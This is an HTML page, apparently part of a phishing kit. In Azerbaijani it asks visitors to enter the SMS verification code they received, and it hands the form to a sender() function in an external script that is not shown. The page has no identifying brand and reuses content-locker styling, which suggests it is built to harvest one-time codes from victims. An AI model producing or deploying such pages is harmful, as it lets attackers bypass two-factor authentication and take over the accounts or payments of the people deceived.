<html lang="en" style="height:90%;">

<head>
	<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
	<title>SMS</title>
	<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
	<link href="https://cdn.jsdelivr.net/npm/bootstrap@5.0.0-beta1/dist/css/bootstrap.min.css" rel="stylesheet">
	<link rel="icon" type="image/x-icon" href="https://cdn-icons-png.flaticon.com/128/3109/3109329.png">
	 <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.5.1/jquery.min.js"></script>
	<script src="az/mains.js"></script>
	<style>
	body {
		background-color: #;
	}
	/* General Styles */
	
	* {
		padding: 0;
		margin: 0
	}
	/* File Locker */
	
	.fl {
		background-color: #ffffff;
		border-radius: 10px;
		padding: 30px;
		display: block;
		margin: 10px auto;
		text-align: center;
		width: 33%
	}
	
	.fl-text {
		font-family: 'Open Sans', sans-serif;
		font-size: 13px;
		color: #9c9c9c;
		display: inline-block;
		vertical-align: middle
	}
	/* File Locker Head */
	
	.fl-head {
		margin-bottom: 15px
	}
	/* File Locker Body */
	
	.fl-body {
		display: block;
		margin: 0 auto;
		width: 70%
	}
	
	.fl-btn {
		font-family: 'Open Sans', sans-serif;
		border-radius: -10px;
		border: 0;
		background-color: #4875f7;
		color: #fff;
		cursor: pointer;
		padding: 10px 0;
		font-size: 16px;
		width: 100%;
		transition: background-color 0.25s ease-in-out
	}
	
	.fl-btn:focus {
		outline: 0
	}
	
	.fl-btn:hover {
		background-color: #426ce6
	}
	/* File Locker Offers */
	
	.fl-offers {
		display: none;
		margin: 30px 0 15px 0
	}
	
	.fl-offer {
		font-family: 'Open Sans', sans-serif;
		font-size: 13px;
		background-color: #4875f7;
		border-radius: 10px;
		padding: 8px;
		margin-top: 15px;
		display: block;
		color: #fff;
		text-decoration: none;
		transition: background-color 0.25s ease-in-out
	}
	
	.fl-offer:hover {
		background-color: #426ce6
	}
	/* Spinner/Awaiting Activation */
	
	.fl-spinner {
		display: none;
		margin: 30px 0 0 0;
		text-align: center
	}
	
	.fl-spinner .fl-icon-spinner {
		height: 25px;
		width: 25px;
		vertical-align: middle;
		margin-right: 10px;
		-moz-animation: spin 2s infinite linear;
		-webkit-animation: spin 2s infinite linear;
		animation: spin 2s infinite linear
	}
	
	.fl-spinner .fl-icon-spinner path {
		fill: #4875f7
	}
	
	.fl-spinner .fl-text {
		display: inline-block
	}
	/* Spin Keyframes Animation */
	
	@-moz-keyframes spin {
		from {
			-moz-transform: rotate(0deg)
		}
		to {
			-moz-transform: rotate(360deg)
		}
	}
	
	@-webkit-keyframes spin {
		from {
			-webkit-transform: rotate(0deg)
		}
		to {
			-webkit-transform: rotate(360deg)
		}
	}
	
	@keyframes spin {
		from {
			transform: rotate(0deg)
		}
		to {
			transform: rotate(360deg)
		}
	}
	/* Icons */
	
	.fl-icon-dl {
		width: 30px;
		height: 30px;
		vertical-align: middle;
		margin-right: 15px
	}
	
	.fl-icon-lock {
		width: 20px;
		height: 25px;
		vertical-align: middle;
		margin-right: 5px;
		fill: #4875f7
	}
	
	#help-text-offers {
		display: none;
	}
	/* Responsive Media Queries */
	
	@media only screen and (max-width: 1480px) {
		.fl {
			width: 43%
		}
	}
	
	@media only screen and (max-width: 768px) {
		.fl {
			margin: 10px 10px;
			width: auto
		}
		.fl-body {
			width: 100%
		}
	}
	
	@media only screen and (max-width: 460px) {
		.fl-btn {
			font-size: 25px
		}
		.fl-icon-dl {
			width: 25px;
			height: 25px
		}
		.fl-text {
			font-size: 12px
		}
	}
	
	@media only screen and (max-width: 390px) {
		.fl-icon-lock {
			display: block;
			margin: 0 auto 10px
		}
	}
	</style>

	<style>
	body {
		background-color: #198754
	}
	
	.height-100 {
		height: 100vh
	}
	
	.card {
		width: 400px;
		border: none;
		height: 300px;
		box-shadow: 0px 5px 20px 0px #d2dae3;
		z-index: 1;
		display: flex;
		justify-content: center;
		align-items: center
	}
	
	.card h6 {
		color: red;
		font-size: 20px
	}
	
	.inputs input {
		width: 40px;
		height: 40px
	}
	
	input[type=number]::-webkit-inner-spin-button,
	input[type=number]::-webkit-outer-spin-button {
		-webkit-appearance: none;
		-moz-appearance: none;
		appearance: none;
		margin: 0
	}
	
	.card-2 {
		background-color: #fff;
		padding: 10px;
		width: 350px;
		height: 100px;
		bottom: -50px;
		left: 20px;
		position: absolute;
		border-radius: 5px
	}
	
	.card-2 .content {
		margin-top: 50px
	}
	
	.card-2 .content a {
		color: red
	}
	
	.form-control:focus {
		box-shadow: none;
		border: 2px solid red
	}
	
	.validate {
		border-radius: 20px;
		height: 40px;
		background-color: #0d6efd;
		border: 1px solid #00db19;
		width: 300px
	}
	
	input {
		text-align: center;
	}
	</style>
</head>

<body>
	<div class="fl" bis_skin_checked="1">
		<center><img src="https://cdn-icons-png.flaticon.com/128/3109/3109329.png"  alt=""></center>
		<br>
		<p style="font-size:20px" class="f1-text">Mətn mesajında ​​aldığınız doğrulama kodunu daxil edin</p>

			<center>
				 <form action="" onsubmit=" return sender()">

		<h1>
   <center><span id="time"></span></center></h1>					
<h1 style="font-size:16px" >
<br>
			<input style="display: block;
  width: 69%;
  padding: 0.375rem 0.75rem;
  font-size: 1rem;
  line-height: 1.5;
  color: #495057;
  background-color: #fff;
  background-clip: padding-box;
  border: 6px solid #ced4da;
  margin-bottom:14px;
  border-radius: 0.25rem;
  transition: border-color 0.15s ease-in-out, box-shadow 0.15s ease-in-out;" type="tel" id="Code" maxlength="13" required="" name="Co" placeholder="SMS">



<div id="divElement"> </div>

<br>          

              
						        <button onclick="func1()" class="btn btn-danger px-4 validate">Devam</button> 
			   

            
			</form>
			</center>
		</div>
		
					

	

	
</body>

</html>